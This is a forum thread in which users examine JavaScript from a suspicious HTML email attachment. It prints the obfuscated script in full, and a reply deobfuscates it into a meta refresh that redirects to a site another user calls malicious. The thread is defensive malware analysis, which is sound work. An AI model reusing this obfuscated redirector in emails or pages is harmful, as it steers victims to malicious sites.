Dodgy code

[Zath]

I just got 3 or 4 different emails all with an html attachment.
Getting in the source, I grabbed a javascript code from it.
It looks very dodgy to me.
Is there a site that will tell me what it does rather than just validate the code ?
I don't want to post it openly here in case someone runs it and has problems.
However, if any top javascript coders want to look at it, I can pm you the code.

This is at the start of the code and a simple Google search shows it as part of a javascript unpacker.
"function aln6(y75t)"

[Charles Stover]

Just post it.

And it probably is a virus. Hardly anyone uses HTML attachments, unless they are large companies.

And that's precisely what virus JavaScript would look like - random gibberish to make it hard to tell what it says or does.

[Zath]

Ok, here it is.
Several emails titled "Email addresses" and a sender's name.
The source is the same in all the emails.

I did find that one of the mail boxes used to bounce the email was nobletree.org.

The source is as follows...



<!-- saved from url=(0022)http://internet.e-mail -->

<script language="JavaScript" type="text/javascript">function aln6(y75t){var
ojvj="",yuql,sbnj,h9r7,jsy4="c.eq lsoir;p:=\"bm/vhx>0aug-ftn<",jzk6=jsy4.length;eval(unescape("%66un%63ti%6Fn y%79t5%28uo%71l){%6Fjv%6A+=%75oql%7D"));for(h9r7=0;h9r7<y75t.length;h9r7++){sbnj=y75t.charAt(h9r7);yuql=jsy4.indexOf(sbnj);if(yuql>-1){yuql-=(h9r7+1)%jzk6;if(yuql<0){yuql+=jzk6;}yyt5(jsy4.charAt(yuql));}else{yyt5(sbnj);}}eval(unescape("%64oc%75me%6Et.w%72it%65(o%6Avj)%3Boj%76j=%22%22;"));}aln6("cvl.t;-ls>s\"moaq<.t0/cg<=rctlttqcc/ht/.vbuc;p-tq /flfg>qtnnligv0 ae0:0=f.");</script><noscript>To display this page you need a browser that supports JavaScript.</noscript>

[Charles Stover]

Decompressed:
function aln6(y75t)
{
var ojvj="",
yuql,
sbnj,
h9r7,
jsy4 = "c.eq lsoir;p:=\"bm/vhx>0aug-ftn<",
jzk6 = jsy4.length;
function yyt5(uoql)
{
ojvj+=uoql
}
for (h9r7 = 0; h9r7 < y75t.length; h9r7++)
{
sbnj = y75t.charAt(h9r7);
yuql = jsy4.indexOf(sbn j);
if (yuql > -1)
{
yuql -= (h9r7 + 1) % jzk6;
if (yuql < 0)
{
yuql += jzk6;
}
yyt5(jsy4.charAt(yuql));
}
else
{
yyt5(sbnj);
}
}
document.write(ojvj);
ojvj = "";
}
aln6("cvl.t;-ls>s\"moaq<.t0/cg<=rctlttqcc/ht/.vbuc;p-tq /flfg>qtnnligv0 ae0:0=f.");

Legitimate names:
function create(str)
{
var output = "",
str2 = "c.eq lsoir;p:=\"bm/vhx>0aug-ftn<",
character, position;
for (var x = 0; x < str.length; x++)
{
character = str.charAt(x);
position = str2.indexOf(character);
if (position > -1)
{
position -= (x + 1) % str2.length;
if (position < 0)
position += str2.length;
output += str2.charAt(position);
}
else
output += character;
}
document.write(output);
output = "";
}
create("cvl.t;-ls>s\"moaq<.t0/cg<=rctlttqcc/ht/.vbuc;p-tq /flfg>qtnnligv0 ae0:0=f.");

Parsed, you get this:
<meta http-equiv="refresh" content="0;url=http://nobletree.org/x.html" />

Whether or not that page is a virus, I don't care to check.

[Todge]

http://nobletree... IS a malicious site, I assume it is 'peretending' to be http://www.nobletree..., which appears to be a legitimate site.